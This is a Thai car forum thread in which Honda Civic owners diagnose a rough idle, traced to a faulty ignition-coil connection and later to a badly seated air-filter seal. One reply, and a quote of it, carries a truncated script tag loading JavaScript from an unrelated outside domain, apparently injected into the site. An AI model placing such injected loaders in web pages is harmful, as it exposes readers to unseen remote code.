ตอบ
rodcivic


ชื่อเล่น: รถครับ

เข้าร่วม: 29 มิถุนา 2010
ตอบ: 88

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 478
ให้คำขอบคุณ: 37

ที่อยู่: รังสิต
ปี: 2004
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อังคาร, 28 กันยา 2010 17:31 - วิธีแก้ไขอาการเครื่องยนต์สะดุด รอบตกตอนเดินเบาเบื้องต้น
ก่อนอื่นผมต้องขอออกตัวก่อนว่าความรู้ทางเครื่องยนต์กลไกผมยังเท่าหางอึ่งครับ แต่เอาจากที่น้าผมเป็นเจ้าของอู่ และอาศัยจากพี่ๆช่างประจำอู่ต่างๆที่ผมดั้นด้นเอารถผมไปให้เขาแก้ไขอาการเครื่องยนต์สั่นมาจน แทบจะทำเองได้แล้ว เลยเอาประสบการณ์มาถ่ายทอดให้เพื่อนๆพี่ๆน้องๆบ้างเพราะคิดว่าจะเป็นประโยชน์บ้างไม่มากก็น้อยครับ ตามนี้เลยครับ

รถของผม ES 04 VTEC เชื้อเพลิง เบนซิน 91 + LPG หัวฉีด ออโทนิค 54 ลิตร

อาการเครื่องยนต์สั่นเริ่มเกิดขึ้นเมื่อ 4,000 โลที่ผ่านมา(ปัจจุบันไมล์รวม 111,000) อาการคือรอบเดินเบาจะต่ำประมาณ 500 เวลาเร่งเครื่องยนต์ เข้า N จะไปแตะ 0 และขึ้นมาประมาณ 500 และจะเป็นเฉพาะใช้น้ำมัน เวลาตัดเปลี่ยนเป็นแก๊สแล้วเครื่องยนต์จะนิ่งเป็นปกติ แต่รอบเดินเบาก็ยังต่ำ ประมาณ 500 เหมือนเดิม( เซ็งมากมาย)

เอาเข้าอู่แรกซึ่งทำฮอนด้าโดยเฉพาะ ปรากฏว่าปั้มติ๊กทำงานปกติ หัวฉีดก็ปกติ...ช่างทำการตั้งวาล์ว( 400 บ.)+เปลี่ยนเซนเซอร์เพลาลูกเบี้ยว( 1,200 บ.)+ค่าแรง 300 เสียตังไป 1,900 อาการไม่หายยังคงสั่นเหมือนเดิม แถมช่างยังบอกกับผมว่าต้องเปลี่ยนคอล์ยจุดระเบิดหัวเทียน 1 หัวราคา 2,400 ผมหมดงบเลยบอกว่ายังไม่ทำ ทนวิ่งไปอีกเกือบๆเดือนเลยเอาไปล้างปีกฝีเสื้อ(ล้างเอง)รอบเครื่องอาการดีขึ้นเล็กน้อยแต่ไม่หายสั่น เลยสุดจะทนวิ่งไปถามอู่ว่าส ...พี่ๆอู่ใหนจูนแก๊สและแก้ระบบไฟเครื่องดีๆบ้าง...ช่างก็แนะนำมาว่าอู่เฮียตี๋บางพูน แถมบอกทางเสร็จสับ ผมไปถึงร้านเฮียตี๋ เห็นลูกค้าแกเยอะมากอู่ไม่ใหญ่นัก เฮียจัดการถามประวัติรถว่าเป็นมายังไง ผมก็เล่าว่าไปทำและเปลี่ยนอะไรมาบ้าง แกก็จัดการเช็คระบบคอล์ยจุดระเบิด ปรากฏว่าไฟขาดไป 1 คอล์ย (สูบ 1) แกจัดการเทสแรงดันที่ลูกสูบทีละตัว ค่าที่ได้มาปกติดี ทีนี้ก็จัดการถอดหัวเทียนมาเช็คก็ปกติดี สลับคอล์ยจุดระเบิดสูบ 1ก็ยังไม่ทำงาน ทีนี้เฮียแกให้ลูกมือถอดกรองอากาศออกเพื่อที่จะเช็คระบบไฟจุดระเบิดโดยการสุ่มถอดเช็คที่ละหัว ขณะเครื่องยนต์ติดอยู่ ก็พบความผิดปกติที่สายคอล์ยของสูบ 1 เอาโซแน๊คฉีดๆๆๆๆเข้าไปทุกพอท ทีนี้เครื่องลื่นปื๊ดเดินครบสูบ รอบมา 800 นิ่งๆทั้งแก๊สและน้ำมัน สลับไปๆมาๆยังนิ่งไม่กระตุก เช็คค่า ECU ปกติ จบครับจบ ค่าเสียหาย 400 สรุปเส้นผมบังภูเขาครับ
ได้รับคำขอบคุณจาก: kismcomed  Jeab22  zan  curran  soda_get  MK Flying  Nut_Au_Together  kittidech  not555  ming  Saka  silchai  Pete Villian  Oad  Juris  fasang.Mr  jatesada  Justinaen  patoo  edd 01  hokhuk77  aeae..  BULLDOG  MrKhanoon  K-ES  BeL  kai04  kaisuh  the  POD943  k-autosociety  wutdy  Enjoy_ES  vic  peak  witat  skrtel23  benzd  ผู้ใหญ่บ้าน  jerapun2528  cacalot  jk2475  OiShIz  arsenal  oatzakub  pongkung  SYS  etabb  a.say  P.TER.357  puyzaaaaa  tokykung  maxch  thegodyes  aun99  Doraeman  mod_x  okuma  natthakorn5  peet_ja  alit  harry5  jacky19  rawit215  Makai  วุฒิชัย  BastardBoy  bank  Tanadath  kokoh  ahingrace  Freeway  Jom-marn  yoosabai  Phetcharat  Skyforec_ES  thechamp  boymac  sanyaaa  surapong  crows  ae  nooduean_69  pondsamed  csirinant  SimonBKK  OhOnOnO  mamacup009  ekarat  prgs55  kim_possible  The_One  Chonchy  fstyle  mikami  wittayab  tiger2217  civic_es  satan1970  thaipra  poppy  black_civic_es  kort999  focusyo  tawan1986  jagkrapongVilaikaew  sunnytomei  meseoul  Pantamitr  TanKrab  athongchum  OrbLink  hotline172  EsNon  converse  OUM  rakyat  Rachen  ballanupong  Goo_golf  ninenine  KAATO  toptwo  Suyodjg  สมชาย  Vee  domziia  new_zaa  pong5674  qq  civicnoom  atiwarah666  Thanatip  Jameskab  kkanakornkum  Snook  joytom.za  wit2524  zaforzando  BEER_CIVIC ES  saan  karnmotocross01  khunjoke  nagamura  ioats  porche35  veerachai  jeang  dodge.atipush.praditakarakul  Tingly_drums  pakorn25  vor_ped  CALM  Thanakorn Sawanglertwong  Chaiyasit Mobsungnern  Athip Charl Klahan 
kismcomed


เข้าร่วม: 06 พฤษภาคม 2010
ตอบ: 321

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 655
ให้คำขอบคุณ: 1125

ที่อยู่: รังสิต-ธัญบุรี คลอง 3
ปี: 2001
สี: ขาว ทาฟเฟต้า (NH-578)
อังคาร, 28 กันยา 2010 18:05 - วิธีแก้ไขอาการเครื่องยนต์สะดุด รอบตกตอนเดินเบาเบื้องต้น
เก็บข้อมูลคับ
ได้รับคำขอบคุณจาก: jerapun2528  cacalot  arsenal  karnmotocross01 
@hanaga@


เข้าร่วม: 01 ตุลา 2008
ตอบ: 360

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 493
ให้คำขอบคุณ: 132

ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 28 กันยา 2010 18:59 - วิธีแก้ไขอาการเครื่องยนต์สะดุด รอบตกตอนเดินเบาเบื้องต้น
จากที่อ่านสรุปสั้นๆว่า

รอบเดินเบาที่ผิดปกติ มาจากคอล์ยจุดระเบิด ถูกต้องไหมครับ

บันทึกใส่สมองอันน้อยนิดของผมก่อน จะได้ไล่ถูก <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: jerapun2528  cacalot  arsenal  karnmotocross01  Thanakorn Sawanglertwong 
curran


ชื่อเล่น: บี

เข้าร่วม: 07 กันยา 2009
ตอบ: 4300

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2057
ให้คำขอบคุณ: 5484

ที่อยู่: Samutprakarn
ปี: 2001
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 28 กันยา 2010 20:30 - วิธีแก้ไขอาการเครื่องยนต์สะดุด รอบตกตอนเดินเบาเบื้องต้น
ขอบคุณสำหรับ ข้อมูลครับ
ได้รับคำขอบคุณจาก: jerapun2528  cacalot  arsenal  karnmotocross01 
oatzakub


ชื่อเล่น: โอ๊ด ครับ

เข้าร่วม: 03 ธันวา 2009
ตอบ: 354

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 340
ให้คำขอบคุณ: 252

ที่อยู่: สมุทรปราการ
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อังคาร, 28 กันยา 2010 22:59 - วิธีแก้ไขอาการเครื่องยนต์สะดุด รอบตกตอนเดินเบาเบื้องต้น
ได้รับคำขอบคุณจาก: jerapun2528  cacalot  arsenal  karnmotocross01 
Nut_Au_Together


ชื่อเล่น: อู๋

เข้าร่วม: 04 มีนา 2009
ตอบ: 1068

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1244
ให้คำขอบคุณ: 1180

ที่อยู่: พระราม 5 ถนนนครอินทร์-----เจริญกรุง 107-----สุขุมวิท 23
ปี: 2005
สี: ทอง แซทเทิลไลท์ (NH-663M)
อังคาร, 28 กันยา 2010 23:14 - วิธีแก้ไขอาการเครื่องยนต์สะดุด รอบตกตอนเดินเบาเบื้องต้น
ได้รับคำขอบคุณจาก: jerapun2528  cacalot  arsenal  karnmotocross01 
not555


ชื่อเล่น: น๊อต

เข้าร่วม: 10 กรกฎา 2010
ตอบ: 787

Guru ES
Guru ES

ได้รับคำขอบคุณ: 619
ให้คำขอบคุณ: 253

ที่อยู่: Ayutthaya
ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 29 กันยา 2010 07:16 - วิธีแก้ไขอาการเครื่องยนต์สะดุด รอบตกตอนเดินเบาเบื้องต้น
ขอบคุณ ข้ออมูลดีๆคับ
ได้รับคำขอบคุณจาก: jerapun2528  cacalot  arsenal  karnmotocross01 
alpha08


ชื่อเล่น: เอก

เข้าร่วม: 27 กรกฎา 2010
ตอบ: 490

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 422
ให้คำขอบคุณ: 215

ที่อยู่: ลาดกระบัง สนามบินสุวรรณภูมิ
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 29 กันยา 2010 08:44 - วิธีแก้ไขอาการเครื่องยนต์สะดุด รอบตกตอนเดินเบาเบื้องต้น
ขอบคุณ ข้ออมูลดีๆคับ
ได้รับคำขอบคุณจาก: jerapun2528  cacalot  arsenal  karnmotocross01 
rodcivic


ชื่อเล่น: รถครับ

เข้าร่วม: 29 มิถุนา 2010
ตอบ: 88

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 478
ให้คำขอบคุณ: 37

ที่อยู่: รังสิต
ปี: 2004
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พุธ, 29 กันยา 2010 09:45 - วิธีแก้ไขอาการเครื่องยนต์สะดุด รอบตกตอนเดินเบาเบื้องต้น
@hanaga@ พิมพ์ว่า:
จากที่อ่านสรุปสั้นๆว่า

รอบเดินเบาที่ผิดปกติ มาจากคอล์ยจุดระเบิด ถูกต้องไหมครับ

บันทึกใส่สมองอันน้อยนิดของผมก่อน จะได้ไล่ถูก <script src="https://sport32news.com/civicesgroup.js"></


ปัญหาของเครื่องยนต์สะดุดตอนรอบเดินเบาซึ่งทำให้เกิดปัญหาอื่นๆตามมาเช่น สูญเสียกำลังอัดในช่วงออกตัว(ออโต้จะเป็นมากกว่า แมนวน) ห้องโดยสารสั่นเป็นเจ้าเข้า...เวลาหักเลี้ยวยิ่งสั่นมากกว่าเดิมสำลักแถกๆๆ ... ที่ปลายท่อไอเสียจะออกมาเสียงดักแถกๆๆๆ และสั่นเสียงไม่ลื่นหู...เวลาเปิดแอร์ยิ่งสั่นเข้าไปอีกเพราะเครื่องโดนฉุดโดยคอมแอร์...โดยเฉพาะถ้ารถติดๆในเมืองอาจถึงขั้นเปิดกระจกวิ่งเลยเพราะเปิดแอร์ไม่ได้แถมต้องเร่งเครื่องช่วย ที่สำคัญคือถ้าไม่รีบแก้ไขอาจทำให้เกิดปัญหาใหญ่ขึ้นกับเครื่องยนต์หรือระบบอื่นๆตามมา สุดท้ายก็ความปลอดภัยของเรา(รวมทั้งเงินในกระเป๋า)
ปัญหาเครื่องยนต์รอบเดินเบาตกไม่นิ่ง สาเหตุนั้นหลายอย่างครับ แต่ที่ผมบอกเป็นแค่ส่วนนึงที่เราๆพอจะทำได้เองโดยอาจจะไม่ต้องเสียตังโดยไม่จำเป็น โดยเฉพาะพวกเซนเซอร์ต่างๆ+คอล์ยจุดระเบิด ตัวนึงหลายตังครับ มันอาจจะไม่เสียก็ได้ยังไงก็ลองๆตรวจเช็คสายไฟและฟิวต่างๆให้ดีก่อน ส่วนการเทสคอล์ยจุดระเบิดนั้นทำได้หลายวิธีครับ ง่ายๆหน่อยก็ถอดทีละตัวขณะเครื่องยนต์ติดอยู่ในรอบเดินเบา ค่อยๆดึงขึ้นที่ละน้อยถ้าสูบใหนไฟจ่ายปกติจะแสดงอาการสั่นทันทีเราก็เสียบคอล์ยเข้าที่เดิม แต่ถ้าสูบใหนดึงคอล์ยออกแล้วมันยังนิ่งเหมือนเดิมแสดงว่ามีปัญหาครับ ให้เราลองสลับเอาคอล์ยจากสูบอื่นมาใส่สลับดูถ้าเทสแล้วสูบทำงานก็แสดงว่าคอล์ยตัวเดิมของสูบนี้เสียครับอาจจะรั่วลองเอาเทปพันสายไฟพันที่ก้านปลายคอล์ยดูถ้าอาการดีขึ้นก็แสดงว่าคอล์ยรั่วค่อยไปหากะตังมาเปลี่ยนทีหลัง...ถ้านิ่งไม่สะทกสะท้านเทสแล้วไม่แตกต่างยังนิ่งเหมือนเดิมก็ให้ไล่สายไฟฟ้าที่ไปจ่ายคอล์ยครับ เริ่มจากปลั๊กที่เข้าไดเรกคอล์ยก่อนง่ายดี เอาโซแน๊กฉีดๆๆเข้าไปถ้าไม่ดีขึ้นทีนี้ก็ให้รื้อหม้อพักและกรองอากาศออก บริเวณท่อไอดีเข้าเครื่องยนต์จะมีจุดต่อเข้าคอล์ยให้เราดึงปลั๊กออกและฉีดๆๆๆๆ ทีนี้ถ้าไม่หายก็ตัวใครตัวมันละครับผม ...
fasang.Mr


ชื่อเล่น: บี

เข้าร่วม: 23 มีนา 2010
ตอบ: 2101

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1764
ให้คำขอบคุณ: 2323

ที่อยู่: นนทบุรี-ประจวบฯ-พะเยา
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 29 กันยา 2010 12:52 - วิธีแก้ไขอาการเครื่องยนต์สะดุด รอบตกตอนเดินเบาเบื้องต้น
เก็บข้อมูลดีๆครับ ปีเดียวกัยเผื่อมีอาการบ้าง
ได้รับคำขอบคุณจาก: jerapun2528  cacalot  arsenal  karnmotocross01 
Justinaen


ชื่อเล่น: กระแต

เข้าร่วม: 22 ธันวา 2009
ตอบ: 1249

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1280
ให้คำขอบคุณ: 2461

ที่อยู่: พัทลุง - นนทบุรี - ลพบุรี
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พุธ, 29 กันยา 2010 13:30 - วิธีแก้ไขอาการเครื่องยนต์สะดุด รอบตกตอนเดินเบาเบื้องต้น
ได้รับคำขอบคุณจาก: jerapun2528  cacalot  arsenal 
patoo


ชื่อเล่น: พงษ์

เข้าร่วม: 28 สิงหา 2010
ตอบ: 1273

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5438
ให้คำขอบคุณ: 3559

ที่อยู่: บางกอก-สุ1000
ปี: 2004
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พุธ, 29 กันยา 2010 13:49 - วิธีแก้ไขอาการเครื่องยนต์สะดุด รอบตกตอนเดินเบาเบื้องต้น
ขอบคุณครับ

ได้รับคำขอบคุณจาก: jerapun2528  cacalot  arsenal 
edd 01


เข้าร่วม: 15 มกรา 2010
ตอบ: 65

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 34
ให้คำขอบคุณ: 16
พุธ, 29 กันยา 2010 14:45 - วิธีแก้ไขอาการเครื่องยนต์สะดุด รอบตกตอนเดินเบาเบื้องต้น
รถผม 02 vtec น้ำมัน + แก๊สก็อาการคล้ายแบบนี้ ไม่ทราบว่าอู่นี้อยู่แถวไหนครับอยากเอารถไปให้เค้าเช็คทำมั่งครับ รบกวนขอเส้นทางหน่อยครับจะลองปดู ขอบคุณครับ
ได้รับคำขอบคุณจาก: jerapun2528  cacalot  arsenal 
rodcivic


ชื่อเล่น: รถครับ

เข้าร่วม: 29 มิถุนา 2010
ตอบ: 88

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 478
ให้คำขอบคุณ: 37

ที่อยู่: รังสิต
ปี: 2004
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พุธ, 29 กันยา 2010 15:43 - วิธีแก้ไขอาการเครื่องยนต์สะดุด รอบตกตอนเดินเบาเบื้องต้น
อู่ชื่อ บางพูนการช่างครับ อยู่บนถนนรังสิต - ปทุมธานี ถ้ามาจากวิภาวดีขาออก จะต้องเลี้ยวซ้ายเข้าเส้น รังสิต - ปทุมธานี(ตรงข้ามเมเจอร์รังสิต) แล้วตรงมาเรื่อยๆประมาณ 2 กม.(ข้าม 2 สะพาน) เลยซอยสุขี 1 มา ประมาณ 500 เมตรจะเห็นอู่นี้ครับ เจ้าของอู่ชื่อเฮียตี๋ครับใจดีมาก ทำงานระเอียดดี เครื่องมือครบ รับติดตั้งระบบแก๊ส LPG และ NGV ซ่อมระบบไฟฟ้ารถยนต์ รวมถึงช่วงล่างด้วย รถผมแก้จบทีอู่นี้(ทั้งๆที่ไปทำอู่ฮอนด้าใหญ่ๆย่านเมืองเอกมา ยังไม่จบแถมเสียตังไป 2000)

ปล.ผมไม่มีส่วนได้ส่วนเสียครับ อยากให้รถที่รักของเราสมบูรณ์เราๆจะได้สบายใจครับ
ได้รับคำขอบคุณจาก: BeL  jerapun2528  cacalot  arsenal  SYS  maxch  Saka  csirinant  ekarat  jagkrapongVilaikaew  Jameskab  Freeway 
hokhuk77


เข้าร่วม: 08 กุมภา 2009
ตอบ: 1018

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1825
ให้คำขอบคุณ: 994

ที่อยู่: คลองด่าน บางบ่อ สป. & Liverpool city
ปี: 2002
สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 29 กันยา 2010 16:07 - วิธีแก้ไขอาการเครื่องยนต์สะดุด รอบตกตอนเดินเบาเบื้องต้น
เก็บไว้เป็นความรู้ครับ
ได้รับคำขอบคุณจาก: jerapun2528  cacalot  arsenal  Thanakorn Sawanglertwong 
Wolverine


ชื่อเล่น: กีกี้

เข้าร่วม: 27 กันยา 2010
ตอบ: 182

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 170
ให้คำขอบคุณ: 0

ที่อยู่: ในเมือง จ.อุบลราชธานี
ปี: 2004
พุธ, 29 กันยา 2010 20:37 - วิธีแก้ไขอาการเครื่องยนต์สะดุด รอบตกตอนเดินเบาเบื้องต้น
เก็บเป็นความรู้ครับ รถผมก็เป็นเหมือนกัน ยังหาวิธีแก้ไม่ได้ซักทีครับ
ได้รับคำขอบคุณจาก: jerapun2528  cacalot  arsenal 
jaii


เข้าร่วม: 02 กันยา 2010
ตอบ: 11

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 9
ให้คำขอบคุณ: 5
พฤหัส, 30 กันยา 2010 10:49 - วิธีแก้ไขอาการเครื่องยนต์สะดุด รอบตกตอนเดินเบาเบื้องต้น
ได้รับคำขอบคุณจาก: jerapun2528  cacalot  arsenal 
the


ชื่อเล่น: ธี

เข้าร่วม: 30 กันยา 2010
ตอบ: 405

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 276
ให้คำขอบคุณ: 153

ที่อยู่: รัชดา
ปี: 2002
สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
พฤหัส, 30 กันยา 2010 19:59 - วิธีแก้ไขอาการเครื่องยนต์สะดุด รอบตกตอนเดินเบาเบื้องต้น
ขอบคุณคร๊าบบบ
ได้รับคำขอบคุณจาก: jerapun2528  cacalot  arsenal   
k-autosociety


ชื่อเล่น: เค

เข้าร่วม: 16 มิถุนา 2009
ตอบ: 1658

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2144
ให้คำขอบคุณ: 3374

ที่อยู่: uttaradit - kasetnavamin
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 30 กันยา 2010 20:23 - วิธีแก้ไขอาการเครื่องยนต์สะดุด รอบตกตอนเดินเบาเบื้องต้น
ขอบคุณครับ
ได้รับคำขอบคุณจาก: jerapun2528  cacalot  arsenal 
wutdy


ชื่อเล่น: วูดดี้

เข้าร่วม: 13 มกรา 2010
ตอบ: 895

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1250
ให้คำขอบคุณ: 235

ปี: 2001
พฤหัส, 30 กันยา 2010 20:46 - วิธีแก้ไขอาการเครื่องยนต์สะดุด รอบตกตอนเดินเบาเบื้องต้น
อาการใกล้เคียง สงสัยต้องลองบ้างแล้ว ขอบคุณครับ
ได้รับคำขอบคุณจาก: jerapun2528  cacalot  arsenal  Thanakorn Sawanglertwong 
benzd


ชื่อเล่น: เบนซ์

เข้าร่วม: 11 มกรา 2009
ตอบ: 3402

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3986
ให้คำขอบคุณ: 3164

ที่อยู่: เกตุม-มหาชัย-สมุทรสาคร
ปี: 2005
สี: ทอง แซทเทิลไลท์ (NH-663M)
เสาร์, 16 ตุลา 2010 20:26 - วิธีแก้ไขอาการเครื่องยนต์สะดุด รอบตกตอนเดินเบาเบื้องต้น
ขอบคุณครับ
ได้รับคำขอบคุณจาก: jerapun2528  cacalot  arsenal 
jerapun2528


ชื่อเล่น: หน่อง

เข้าร่วม: 16 มิถุนา 2010
ตอบ: 632

Guru ES
Guru ES

ได้รับคำขอบคุณ: 813
ให้คำขอบคุณ: 3025

ที่อยู่: ศูนย์ศรีพัฒน์ คณะแพทยศาสตร์ มหาวิทยาลัยเชียงใหม่
ปี: 2003
สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
เสาร์, 16 ตุลา 2010 20:55 - วิธีแก้ไขอาการเครื่องยนต์สะดุด รอบตกตอนเดินเบาเบื้องต้น
ข้อมูลแน่นครับ
ได้รับคำขอบคุณจาก: cacalot  arsenal 
Fil-reD


ชื่อเล่น: ฟลุ๊ค

เข้าร่วม: 04 ตุลา 2009
ตอบ: 985

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 757
ให้คำขอบคุณ: 597

ที่อยู่: รามอินทรา_ที่ๆมีสุรา
ปี: 2003
เสาร์, 16 ตุลา 2010 23:57 - วิธีแก้ไขอาการเครื่องยนต์สะดุด รอบตกตอนเดินเบาเบื้องต้น
ข้อมูล
ได้รับคำขอบคุณจาก: cacalot  arsenal 
newcolor


เข้าร่วม: 10 กรกฎา 2010
ตอบ: 989

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2374
ให้คำขอบคุณ: 3894
อาทิตย์, 17 ตุลา 2010 02:26 - วิธีแก้ไขอาการเครื่องยนต์สะดุด รอบตกตอนเดินเบาเบื้องต้น
ได้รับคำขอบคุณจาก: cacalot  arsenal 
Keng01


ชื่อเล่น: เก่ง

เข้าร่วม: 07 มิถุนา 2009
ตอบ: 324

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 423
ให้คำขอบคุณ: 203

ที่อยู่: นครสวรรค์
ปี: 2001
สี: เทา ซิลเวอร์สโตน (NH-630M)
อาทิตย์, 17 ตุลา 2010 10:10 - วิธีแก้ไขอาการเครื่องยนต์สะดุด รอบตกตอนเดินเบาเบื้องต้น
ของผมก็เคยเป็นคับ....เปลี่ยนหัวเทียน...ล้างปีกผีเสื้อก็ไม่หาย
สรุปช่างจะเปลี่ยนอ็อกซิเจนพอถอดออกมาตรงปลั๊กมีคลาบสนิมเกาะช่างเลยทำความสะอาด
กลับมาใช้งานได้ตามปกติเลยคับ......เส้นผมบังภูเขาเหมือนกันเลย
ได้รับคำขอบคุณจาก: cacalot  arsenal  suttijate 
cacalot


เข้าร่วม: 31 สิงหา 2010
ตอบ: 1058

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1288
ให้คำขอบคุณ: 6066

ที่อยู่: พังงา
ปี: 2001
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อาทิตย์, 17 ตุลา 2010 10:18 - วิธีแก้ไขอาการเครื่องยนต์สะดุด รอบตกตอนเดินเบาเบื้องต้น
แน่นๆ ขอบคุงคร้าฟฟฟฟ
ได้รับคำขอบคุณจาก: arsenal 
arsenal


ชื่อเล่น: ไม้

เข้าร่วม: 06 กรกฎา 2010
ตอบ: 3035

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2300
ให้คำขอบคุณ: 4312

ที่อยู่: เพชรบุรี หัวหิน ประจวบ
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อาทิตย์, 17 ตุลา 2010 21:12 - วิธีแก้ไขอาการเครื่องยนต์สะดุด รอบตกตอนเดินเบาเบื้องต้น
เก็บข้อมูล คร๊าบบบบบ
wighwaytak


เข้าร่วม: 29 มกรา 2010
ตอบ: 676

Guru ES
Guru ES

ได้รับคำขอบคุณ: 904
ให้คำขอบคุณ: 878

ที่อยู่: ตาก-กำแพงเพชร
ปี: 2001
สี: ขาว ทาฟเฟต้า (NH-578)
อาทิตย์, 17 ตุลา 2010 23:12 - วิธีแก้ไขอาการเครื่องยนต์สะดุด รอบตกตอนเดินเบาเบื้องต้น
ของผมอาการคล้ายๆกันครับแต่อ่านโค๊ดแล้วเป็นที่โอทูเซนเซอร์ ไปซื้อเซียงกงมา1500 กลับมาบ้านลองเอาโซแน็กซ์ฉีดขั้วตัวเดิม
ใช้งานปกติเฉย เซ็งห่าน555
rodcivic


ชื่อเล่น: รถครับ

เข้าร่วม: 29 มิถุนา 2010
ตอบ: 88

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 478
ให้คำขอบคุณ: 37

ที่อยู่: รังสิต
ปี: 2004
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
จันทร์, 18 ตุลา 2010 09:20 - วิธีแก้ไขอาการเครื่องยนต์สะดุด รอบตกตอนเดินเบาเบื้องต้น
Keng01 พิมพ์ว่า:
ของผมก็เคยเป็นคับ....เปลี่ยนหัวเทียน...ล้างปีกผีเสื้อก็ไม่หาย
สรุปช่างจะเปลี่ยนอ็อกซิเจนพอถอดออกมาตรงปลั๊กมีคลาบสนิมเกาะช่างเลยทำความสะอาด
กลับมาใช้งานได้ตามปกติเลยคับ......เส้นผมบังภูเขาเหมือนกันเลย

up ให้ครับผม ล่าสุดเครื่องยนต์ผมดับไป 4 ครั้งขณะขับรถอยู่บนเส้นทาง รังสิต-นครนายกขาเข้า ช่วงคลอง 3-คลอง1 ลองคิดดูครับตอนนั้นประมาณ 2 ทุ่มแถมฝนตกด้วยมันจะเกิดอะไรขึ้น เบาเป็นดับ รถเกียร์ออโตด้วยเลี้ยงรอบลำบาก ต้องปิดแอร์เปิดกระจก ทิ้งระยะห่างจากคันหน้า พอไฟตูดคันหน้าแดงก็ปลดเกียร์ว่างดึงเบรกมือเข้า D แถมเร่งเครื่องเลี้ยงรอบไว้ พอคันหน้าออกตัว บางทีรอบจัดเอี๊ยดเลยหุๆ เซร็งอย่างแรง(พวกไม่รู้คงหมั่นไส้อย่างแรง) อู่ก็หายากมากเพราะมันอยู่ฝั่งตรงข้าม แต่สุดท้ายก็หาอู่เจอจนได้ รอดจากการถูดเสยตูดอย่างหวุดหวิด สรุปการที่รอบเดินเบาตก(อย่างแรง)ครั้งนี้เนื่องจากผมทำการล้างปีกผีเสื้อเอง แล้วเวลาระกอบกรองอากาศเข้าที่เดิมมันไม่สนิททำให้ยางที่ครอบรอบๆปากลิ้นปีกผีเสี้อไม่สนิท อากาศมันเลยลัดผ่านตรงๆจากภายนอกเข้าปีกผีเสื้อโดยตรง คือไม่ได้ผ่านกรองอากาศและผ่านออกซิเจนเซนเซอร์หน้าปีก สรุปคือเครื่องเลยรวนเนื่องจากการประมาณผลของออกซิเจนเซนเซอร์ ที่มันจับค่าออกซิเจนไม่ได้ เสียตังไป 100 บาทค่าแรงใส่ยางตัวนี้อิๆ ใส่ปุ๊ปรอบมาปกติอย่างกับพลิกลิ้นอิๆเปิดแอร์เต็มๆก็ไม่ตก กำเพราะเราเองแท้ๆใส่ไม่ดีเกือบซรวยๆ
ได้รับคำขอบคุณจาก: SYS  okuma  jacky19  Saka  ekarat  athongchum  kkanakornkum 
rattikan


ชื่อเล่น: น้องโบว์

เข้าร่วม: 20 พฤศจิกา 2010
ตอบ: 34

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 17
ให้คำขอบคุณ: 2

ที่อยู่: พระประแดง
ปี: 2002
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 9 มิถุนา 2011 11:56 - วิธีแก้ไขอาการเครื่องยนต์สะดุด รอบตกตอนเดินเบาเบื้องต้น
อาการใกล้เึัคียงกับที่เป็นอยู่ค่ะ...ขอบคุณสำหรับข้อมูลจะเอารถไปเช็คบ้าง :)
ได้รับคำขอบคุณจาก: วุฒิชัย 
ตอบ
หน้า 1 จาก 3
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.
Loading...